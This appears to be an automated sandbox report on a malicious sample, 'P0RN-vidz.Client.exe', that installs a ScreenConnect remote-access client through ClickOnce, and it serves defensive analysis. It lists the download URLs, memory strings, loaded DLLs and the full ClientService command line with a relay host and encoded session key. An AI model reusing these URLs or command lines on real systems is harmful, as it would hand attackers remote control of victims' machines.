                  Source: dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Core.dllL#
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C271B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Wind8
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C271B5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3002950824.0000020C24EF4000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26CD9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000001.00000002.3002950824.0000020C24EF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Windows.dllC
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C270FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstage
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27167000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstageShell.ex
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C270FA000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27167000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3018292902.0000020C40D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config
                  Source: dfsvc.exe, 00000001.00000002.3018292902.0000020C40D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config3
                  Source: dfsvc.exe, 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstageShell.exeL
                  Source: dfsvc.exe, 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstageShell.exe_
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsC0
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27211000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26CD9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27159000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsClient.exe.configq
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsClient.exx
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C270FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsFileManager.e
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C2717F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: dfsvc.exe, 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsFileManager.exe.configf
                  Source: dfsvc.exe, 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsFileManager.exek
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C2717F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsFileManagp
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                  Source: svchost.exe, 00000007.00000002.3278760569.000001CCF78DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                  Source: svchost.exe, 00000007.00000002.3280345001.000001CCF868B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srfityCRL
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                  Source: svchost.exe, 00000007.00000002.3278245997.000001CCF782B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAoc
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                  Source: svchost.exe, 00000007.00000002.3278245997.000001CCF782B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfsuer
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                  Source: qmgr.db.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF812C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8155000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                  Source: unknownHTTPS traffic detected: 147.75.81.6:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect

                  System Summary

                  Source: P0RN-vidz.Client.exe PE Signature Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 6780 -ip 6780
                  Source: P0RN-vidz.Client.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, PopoutPanelTaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, ProgramTaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, TaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engine Classification label: mal48.evad.winEXE@18/82@5/3
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exe Code function: 0_2_00371000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00371000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Deployment
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe Mutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6780
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exe Command line argument: dfshim 0_2_00371000
                  Source: P0RN-vidz.Client.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknown Process created: C:\Users\user\Desktop\P0RN-vidz.Client.exe "C:\Users\user\Desktop\P0RN-vidz.Client.exe"
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 884
                  Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&r=&i=USTest%20191224%20140" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&r=&i=USTest%20191224%20140" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe" "RunRole" "1cec62b5-23ad-4984-ac47-8ca096d23ddd" "User"
                  Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 884
                  Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: samcli.dll
